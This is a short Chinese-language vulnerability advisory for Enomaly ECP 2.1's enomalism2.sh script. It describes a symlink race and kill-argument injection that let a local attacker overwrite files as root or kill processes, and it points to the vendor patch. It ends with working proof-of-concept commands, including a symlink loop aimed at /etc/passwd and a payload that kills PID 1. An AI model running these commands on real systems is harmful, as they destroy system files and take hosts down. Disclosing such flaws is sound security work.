BUGTRAQ ID: 33544
CVE(CAN) ID: CVE-2008-4990,CVE-2009-0390
Enomaly ECP(之前名为Enomalism)是用于管理虚拟机的软件。
ECP的enomalism2.sh中存在多个安全漏洞,本地攻击者可以通过符号链接攻击以root用户权限覆盖任意系统文件、向kill命令注入参数以终止任意进程或向进程发送信号,或导致虚拟机无法启动。
Enomaly Elastic Computing Platform 2.1
临时解决方法:
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://sourceforge.net/project/showfiles.php?group_id=164855&package_id=186866&release_id=660061” target=“_blank”>http://sourceforge.net/project/showfiles.php?group_id=164855&package_id=186866&release_id=660061</a>
a. while true; do ln -s /etc/passwd /tmp/enomalism2.pid; done
b. echo "-9 1" > /tmp/enomalism2.pid
c. i. ln -s /tmp/root /tmp/enomalism2.pid
ii. chgrp beetroot /tmp/enomalism2.pid